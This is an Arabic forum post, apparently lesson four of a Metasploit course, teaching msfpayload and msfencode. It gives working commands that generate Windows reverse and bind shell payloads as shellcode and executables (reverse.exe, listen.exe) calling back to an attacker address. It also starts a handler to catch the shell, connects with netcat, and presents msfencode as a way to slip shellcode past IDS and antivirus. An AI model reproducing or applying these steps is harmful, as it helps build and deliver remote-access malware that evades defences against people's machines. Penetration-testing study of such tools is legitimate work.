Boss Admin
عدد المساهمات : 50 تاريخ التسجيل : 24/07/2013
| موضوع: الدرس الرابع : استخدام msfencode , msfpayload [ دورة الميتاسبلويت ] الأحد أغسطس 04, 2013 2:08 pm | |
| السلام عليكم ورحمه الله وبركاته
اليوم درسنآ يكمل الدرس السابق .
1- msfpayload
msfencode -2
msfpayload : اداه مهمه لعمل الـ shellcode
الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه
سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA
طريقه عمله . [/b][/b][/b][/b] كود PHP: الرمز: | ./msfpayload payload var=val
|
payload = اسم البايلود
var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم
كيف نعرف متغيرات الـ payload ؟
نعرفها عن طريق الامر كود PHP: الرمز: | ./msfpayload windows/shell/reverse_tcp O
|
الصوره تتكلم . local port= lport البورت الخاص بالمهاجم , local host = lhostip الخاص بالمهاجم خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lportbind_shell الحصول على شل بأتصال مباشر reverse_shell الحصول على شل بأتصال عكسي الان نعمل تطبيق . كود PHP: الرمز: | ./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C
|
[/QUOTE] الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload , البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe كيف نعمله على صيغه exe , بأستخدام mfspayload . مثال لعمل exeكود PHP: الرمز: | ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe
|
طريقه التنصت للاتصال
./
كود PHP: الرمز: | msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E
|
msfcli راح اشرحها بدرس القادم .
مثال اخر كود PHP: الرمز: | ./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
|
الان راح نستخدم netcat
nc -vn 192.168.1.2 4444
~~~~~~~~~~~~~~~~
msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV
كود PHP: الرمز: | Usage: ./msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer
-x <opt> Specify an alternate win32 executable template
|
الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز . [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الان بقى الواجهات 1-msfconsole msfcli -2 msfgui -3 msfwe b -4 وراح يتم التطرق لها بالدرس القادم . قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس ! لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟ كود PHP: الرمز: | ./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe
|
الان راح نستخدم netcatnc -vn 192.168.1.2 4444 ولماذا > متعوب عليها استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض ! كود PHP: الرمز: | ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe
|
طريقه التنصت للاتصال
./
كود PHP: الرمز: | msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E
|
الجواب راح تلقونه بالدروس السابقه اذا كنت متابع hint: الجواب 5 كلمات | |
|